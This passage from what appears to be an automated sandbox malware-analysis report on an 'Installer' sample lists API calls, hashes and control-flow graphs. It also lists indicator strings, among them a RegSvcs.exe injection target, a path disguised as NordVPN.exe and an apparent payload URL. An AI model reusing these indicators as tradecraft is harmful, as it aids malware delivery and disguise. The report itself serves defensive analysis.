                                                                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1703294689-0
                                                                                                                                        • Opcode ID: 77b42b29204b7d947917996fd1e4fb02413e328632e4c7c66fde6788463af3bf
                                                                                                                                        • Instruction ID: 9aa72e04642c2f64552c418e680b2aa6e77fe6bfb692f2e3acdbf99b0fc8414d
                                                                                                                                        • Opcode Fuzzy Hash: 77b42b29204b7d947917996fd1e4fb02413e328632e4c7c66fde6788463af3bf
                                                                                                                                        • Instruction Fuzzy Hash: 31E04631410218ABCB163F54ED0DA483BA9EB40362B904010FA05D7131DB75EDA5CA88
                                                                                                                                        APIs
                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0025210B
                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 002521D7
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002521F7
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00252201
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                        • Opcode ID: 4ba0a108e7fd71762b7cb612ef6968575b4ae891d6cbbb5ceb4ba79ffbb2e87f
                                                                                                                                        • Instruction ID: fe403c6472fdd97feb97b1e24763864d336dced39309dc8d55bc623e32072ec1
                                                                                                                                        • Opcode Fuzzy Hash: 4ba0a108e7fd71762b7cb612ef6968575b4ae891d6cbbb5ceb4ba79ffbb2e87f
                                                                                                                                        • Instruction Fuzzy Hash: 6C312B75D5522CDBDB10EFA4D949BCDBBB8AF04305F10409AE94DA7290EB705A88CF04
                                                                                                                                        APIs
                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000077E), ref: 00255F81
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000077E), ref: 00255F8B
                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00000456,?,?,?,?,?,0000077E), ref: 00255F98
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3906539128-0
                                                                                                                                        • Opcode ID: 9542c1a157a5600df5b109d3881dabac867910724f28facbc709b2e9935e70f5
                                                                                                                                        • Instruction ID: 78df14fd447c913aa53c2fbd34d157316c502aff4857b3eb2f5f5e452dc50257
                                                                                                                                        • Opcode Fuzzy Hash: 9542c1a157a5600df5b109d3881dabac867910724f28facbc709b2e9935e70f5
                                                                                                                                        • Instruction Fuzzy Hash: FC31F474911228EBCB25DF64DD887CDBBB8BF08311F5041DAE81CA6290E7709B998F44
                                                                                                                                        APIs
                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(0025226E,00251B90), ref: 00252267
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                        • Opcode ID: 1016770d65b24fae94a57163ae1b41e14698b0293a721888dd51c18c30465dd1
                                                                                                                                        • Instruction ID: 686eebf1c562fafac781fac79072c2edd0a02b1699a4e23d3a18e6ccda2345fa
                                                                                                                                        • Opcode Fuzzy Hash: 1016770d65b24fae94a57163ae1b41e14698b0293a721888dd51c18c30465dd1
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                        • Opcode ID: c01b2a94b2ddbed891a4062424461cff51c789b1fc2a2cffd90ddac8e27c96a6
                                                                                                                                        • Instruction ID: 7e77b4f5e60ca826daa79e33a8b8d43207b38d2aa5d8560910e3d8f0e2374843
                                                                                                                                        • Opcode Fuzzy Hash: c01b2a94b2ddbed891a4062424461cff51c789b1fc2a2cffd90ddac8e27c96a6
                                                                                                                                        • Instruction Fuzzy Hash: 11A01130A002008B8B008F32BA0E2083EA8AA02280302C0A8E00AC3020EAB088A08F00
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a793b272f265c7c9ad7eac11a249094c9b9267c6eb4b466c4c6bf0a69bf33f26
                                                                                                                                        • Instruction ID: de95313bdc983833ca4eae96b5b51f8d14292db2a8ece2c67d60f31d93e063b6
                                                                                                                                        • Opcode Fuzzy Hash: a793b272f265c7c9ad7eac11a249094c9b9267c6eb4b466c4c6bf0a69bf33f26
                                                                                                                                        • Instruction Fuzzy Hash: 62E08C32A21228EBCB19DB8CD94498AF3ECEB44B02F514496B901E3140D374DE14CBD4

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 234 25bc4a-25bc5e 235 25bc60-25bc65 234->235 236 25bccc-25bcd4 234->236 235->236 237 25bc67-25bc6c 235->237 238 25bcd6-25bcd9 236->238 239 25bd1b-25bd33 call 25bdbb 236->239 237->236 241 25bc6e-25bc71 237->241 238->239 240 25bcdb-25bd18 call 25792b * 4 238->240 249 25bd36-25bd3d 239->249 240->239 241->236 244 25bc73-25bc7b 241->244 247 25bc95-25bc9d 244->247 248 25bc7d-25bc80 244->248 251 25bcb7-25bccb call 25792b * 2 247->251 252 25bc9f-25bca2 247->252 248->247 253 25bc82-25bc94 call 25792b call 25b803 248->253 254 25bd5c-25bd60 249->254 255 25bd3f-25bd43 249->255 251->236 252->251 257 25bca4-25bcb6 call 25792b call 25b901 252->257 253->247 258 25bd62-25bd67 254->258 259 25bd78-25bd84 254->259 262 25bd45-25bd48 255->262 263 25bd59 255->263 257->251 266 25bd75 258->266 267 25bd69-25bd6c 258->267 259->249 269 25bd86-25bd91 call 25792b 259->269 262->263 271 25bd4a-25bd58 call 25792b * 2 262->271 263->254 266->259 267->266 276 25bd6e-25bd74 call 25792b 267->276 271->263 276->266
                                                                                                                                        APIs
                                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0025BC8E
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B820
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B832
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B844
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B856
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B868
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B87A
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B88C
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B89E
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B8B0
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B8C2
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B8D4
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B8E6
                                                                                                                                          • Part of subcall function 0025B803: _free.LIBCMT ref: 0025B8F8
                                                                                                                                        • _free.LIBCMT ref: 0025BC83
                                                                                                                                          • Part of subcall function 0025792B: HeapFree.KERNEL32(00000000,00000000,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093), ref: 00257941
                                                                                                                                          • Part of subcall function 0025792B: GetLastError.KERNEL32(00251093,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093,00251093), ref: 00257953
                                                                                                                                        • _free.LIBCMT ref: 0025BCA5
                                                                                                                                        • _free.LIBCMT ref: 0025BCBA
                                                                                                                                        • _free.LIBCMT ref: 0025BCC5
                                                                                                                                        • _free.LIBCMT ref: 0025BCE7
                                                                                                                                        • _free.LIBCMT ref: 0025BCFA
                                                                                                                                        • _free.LIBCMT ref: 0025BD08
                                                                                                                                        • _free.LIBCMT ref: 0025BD13
                                                                                                                                        • _free.LIBCMT ref: 0025BD4B
                                                                                                                                        • _free.LIBCMT ref: 0025BD52
                                                                                                                                        • _free.LIBCMT ref: 0025BD6F
                                                                                                                                        • _free.LIBCMT ref: 0025BD87
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 161543041-0
                                                                                                                                        • Opcode ID: 62c53868b73664a9f32e11df384456154fb1f3badcecc9ac1b7e1f45085c9f86
                                                                                                                                        • Instruction ID: 147691c5b856b870cec6ca9ce3d03e9d7dd791b66857375534c5f1bd58e95d44
                                                                                                                                        • Opcode Fuzzy Hash: 62c53868b73664a9f32e11df384456154fb1f3badcecc9ac1b7e1f45085c9f86
                                                                                                                                        • Instruction Fuzzy Hash: 0B316F315247029FEB22BF39E845B5A73E8EF14752F14481AE855D7191EF30EC68CB28

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 291 2533cb-2533f6 call 254338 294 2533fc-2533ff 291->294 295 25376f-253774 call 2573f6 291->295 294->295 296 253405-25340e 294->296 298 253414-253418 296->298 299 25350b-253511 296->299 298->299 301 25341e-253425 298->301 302 253519-253527 299->302 303 253427-25342e 301->303 304 25343d-253442 301->304 305 25352d-253531 302->305 306 2536d8-2536db 302->306 303->304 307 253430-253437 303->307 304->299 310 253448-253450 call 253086 304->310 305->306 311 253537-25353e 305->311 308 2536dd-2536e0 306->308 309 2536fe-253707 call 253086 306->309 307->299 307->304 308->295 312 2536e6-2536fb call 253775 308->312 309->295 327 253709-25370d 309->327 326 253456-25346f call 253086 * 2 310->326 310->327 314 253556-25355c 311->314 315 253540-253547 311->315 312->309 321 253674-253678 314->321 322 253562-253589 call 252696 314->322 315->314 319 253549-253550 315->319 319->306 319->314 323 253684-253690 321->323 324 25367a-253683 call 252ace 321->324 322->321 337 25358f-253592 322->337 323->309 330 253692-253696 323->330 324->323 326->295 352 253475-25347b 326->352 334 2536a8-2536b0 330->334 335 253698-2536a0 330->335 340 2536c7-2536d4 call 253dda 334->340 341 2536b2-2536c5 call 253086 * 2 334->341 335->309 339 2536a2-2536a6 335->339 338 253595-2535aa 337->338 343 253655-253668 338->343 344 2535b0-2535b3 338->344 339->309 339->334 354 2536d6 340->354 355 253733-253748 call 253086 * 2 340->355 364 25370e call 25739f 341->364 343->338 348 25366e-253671 343->348 344->343 349 2535b9-2535c1 344->349 348->321 349->343 353 2535c7-2535db 349->353 357 2534a7-2534af call 253086 352->357 358 25347d-253481 352->358 360 2535de-2535ee 353->360 354->309 387 25374d-25376a call 252889 call 253cda call 253e97 call 253c51 355->387 388 25374a 355->388 373 2534b1-2534d1 call 253086 * 2 call 253dda 357->373 374 253513-253516 357->374 358->357 359 253483-25348a 358->359 365 25348c-253493 359->365 366 25349e-2534a1 359->366 367 253616-253623 360->367 368 2535f0-253603 call 2538ab 360->368 382 253713-25372e call 252ace call 253a56 call 252c87 364->382 365->366 371 253495-25349c 365->371 366->295 366->357 367->360 376 253625 367->376 384 253605-25360b 368->384 385 253627-25364f call 25334b 368->385 371->357 371->366 373->374 405 2534d3-2534d8 373->405 374->302 381 253652 376->381 381->343 382->355 384->368 390 25360d-253613 384->390 385->381 387->295 388->387 390->367 405->364 407 2534de-2534f1 call 253a6e 405->407 407->382 411 2534f7-253503 407->411 411->364 412 253509 411->412 412->407
                                                                                                                                        APIs
                                                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 002534C8
                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 002534EA
                                                                                                                                        • ___TypeMatch.LIBVCRUNTIME ref: 002535F9
                                                                                                                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 002536CB
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 0025374F
                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0025376A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                        • String ID: csm$csm$csm$A&
                                                                                                                                        • API String ID: 2123188842-557076834
                                                                                                                                        • Opcode ID: 406bfaa887768d681d8fd49713862562d01fd589bb83a46fee8087b2262f4f6f
                                                                                                                                        • Instruction ID: 7cf8debafdc10e8372c8ecd6d66f0f455c4c0d44448e6eeeb04bfb5429bc3a88
                                                                                                                                        • Opcode Fuzzy Hash: 406bfaa887768d681d8fd49713862562d01fd589bb83a46fee8087b2262f4f6f
                                                                                                                                        • Instruction Fuzzy Hash: C0B19D71C2020AEFCF15DF94C9819AEBBB5BF08352B146059EC006B212D731DB69CF99

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 413 251285-25128a call 251ab8
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00251285
                                                                                                                                          • Part of subcall function 00251AB8: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00251AC4
                                                                                                                                          • Part of subcall function 00251AB8: __RTC_Initialize.LIBCMT ref: 00251B0A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$ET\Framework\v4.0.30319\RegSvcs.exe$MZx$SizeofResource$TAFstfdewtdwe$VirtualProtect$\Microsoft\NordVPN.exe$http://joxi.net/4Ak49WQH0GE3Nr.mp3$open
                                                                                                                                        • API String ID: 937804987-309544318
                                                                                                                                        • Opcode ID: e8f53e1ebbecd71e3ec4914858243ce968857960c82ab1af49be35d77a1ee39e
                                                                                                                                        • Instruction ID: 247bb36fd57394126d3643eee0adc13300a6e657a31ee5dc7376b27011518666
                                                                                                                                        • Opcode Fuzzy Hash: e8f53e1ebbecd71e3ec4914858243ce968857960c82ab1af49be35d77a1ee39e
                                                                                                                                        • Instruction Fuzzy Hash:

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 416 258bc2-258bd5 417 258bd7-258be0 call 25792b 416->417 418 258be1-258c8e call 25792b * 9 call 2589ee call 258a59 416->418 417->418
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00258BD8
                                                                                                                                          • Part of subcall function 0025792B: HeapFree.KERNEL32(00000000,00000000,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093), ref: 00257941
                                                                                                                                          • Part of subcall function 0025792B: GetLastError.KERNEL32(00251093,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093,00251093), ref: 00257953
                                                                                                                                        • _free.LIBCMT ref: 00258BE4
                                                                                                                                        • _free.LIBCMT ref: 00258BEF
                                                                                                                                        • _free.LIBCMT ref: 00258BFA
                                                                                                                                        • _free.LIBCMT ref: 00258C05
                                                                                                                                        • _free.LIBCMT ref: 00258C10
                                                                                                                                        • _free.LIBCMT ref: 00258C1B
                                                                                                                                        • _free.LIBCMT ref: 00258C26
                                                                                                                                        • _free.LIBCMT ref: 00258C31
                                                                                                                                        • _free.LIBCMT ref: 00258C3F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: eefaf2242de21d40c34605a93a5428097c63d9fe6a0327e3db0881574f9f182e
                                                                                                                                        • Instruction ID: 36d6e656c3a9f3e231dd1bed5eb9d439b40e4e0fc0982377e8c4c91dc280a8d7
                                                                                                                                        • Opcode Fuzzy Hash: eefaf2242de21d40c34605a93a5428097c63d9fe6a0327e3db0881574f9f182e
                                                                                                                                        • Instruction Fuzzy Hash: 2B21D87A914108AFCB01FF95E881DDD7BB8BF08301F005166FA059B121EB31EA59CF94

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 443 25b1c5-25b1d3 444 25b1d5-25b1e3 call 2578bb 443->444 445 25b1e8-25b1fb call 2632b0 443->445 452 25b3f5-25b3f7 444->452 450 25b201-25b203 445->450 451 25b3dc-25b3e1 call 2578bb 445->451 450->451 453 25b209-25b21c call 25b4b3 450->453 458 25b3e7 451->458 459 25b21e-25b221 453->459 460 25b299-25b2a3 453->460 461 25b3ea-25b3f4 call 25792b 458->461 462 25b223-25b229 459->462 463 25b23f-25b242 459->463 460->458 464 25b2a9-25b2bf call 25b4cd 460->464 461->452 462->463 466 25b22b-25b232 call 2568ee 462->466 468 25b244-25b246 463->468 469 25b24b-25b24d 463->469 476 25b2c1-25b2c3 464->476 477 25b310-25b313 464->477 466->451 479 25b238-25b23d call 25b4b3 466->479 468->461 471 25b24f call 2578ce 469->471 474 25b254-25b268 call 25792b 471->474 474->458 487 25b26e-25b274 474->487 476->477 481 25b2c5-25b2d4 call 25792b 476->481 477->461 480 25b319-25b323 477->480 479->460 480->458 485 25b329-25b32f 480->485 491 25b306-25b30e 481->491 492 25b2d6-25b2d9 481->492 485->458 489 25b335-25b34f call 25bf67 call 25792b 485->489 487->460 493 25b276-25b278 487->493 489->458 507 25b355-25b35d 489->507 497 25b366-25b369 491->497 495 25b2e3-25b2e6 492->495 496 25b27a call 2578ce 493->496 499 25b2e8-25b302 call 25bf67 call 25792b 495->499 500 25b2db-25b2e2 495->500 501 25b27f-25b293 call 25792b 496->501 497->461 502 25b36b 497->502 499->497 516 25b304 499->516 500->495 501->458 501->460 506 25b36e-25b373 502->506 506->506 510 25b375-25b37d 506->510 511 25b361 507->511 513 25b380 call 2578ce 510->513 511->497 515 25b385-25b38b 513->515 517 25b3d3-25b3da call 25792b 515->517 518 25b38d-25b39e call 25743a 515->518 516->511 517->461 523 25b3a0-25b3c3 call 2603a6 518->523 524 25b3f8 518->524 523->517 529 25b3c5-25b3cd call 2578bb 523->529 526 25b3fd call 256065 524->526 528 25b402 526->528 529->517
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$___from_strstr_to_strchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3409252457-0
                                                                                                                                        • Opcode ID: 88b8b2078e1dcd492e7ed0316997f502d68ebbab8fa6e3e06495197ceaa4dece
                                                                                                                                        • Instruction ID: ed919c062ab57611531150dd244b13ff60e8d162aedd8ffcb237b97a7d330f5d
                                                                                                                                        • Opcode Fuzzy Hash: 88b8b2078e1dcd492e7ed0316997f502d68ebbab8fa6e3e06495197ceaa4dece
                                                                                                                                        • Instruction Fuzzy Hash: C9512B70964306FFDB12BFB4A885A6D7BA4EF01312F1441AAFD40A7191EB71C928CF58

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 532 252d40-252d91 call 2633db call 252d00 call 253efc 539 252d93-252da5 532->539 540 252ded-252df0 532->540 541 252e10-252e19 539->541 543 252da7-252dbe 539->543 540->541 542 252df2-252dff call 254080 540->542 549 252e04-252e0d call 252d00 542->549 545 252dd4 543->545 546 252dc0-252dce call 254020 543->546 548 252dd7-252ddc 545->548 553 252de4-252deb 546->553 554 252dd0 546->554 548->543 551 252dde-252de0 548->551 549->541 551->541 555 252de2 551->555 553->549 557 252dd2 554->557 558 252e1a-252e23 554->558 555->549 557->548 559 252e25-252e2c 558->559 560 252e5d-252e6d call 254060 558->560 559->560 561 252e2e-252e3d call 262d50 559->561 566 252e81-252e9d call 252d00 call 254040 560->566 567 252e6f-252e7e call 254080 560->567 569 252e3f-252e57 561->569 570 252e5a 561->570 567->566 569->570 570->560
                                                                                                                                        APIs
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00252D77
                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00252D7F
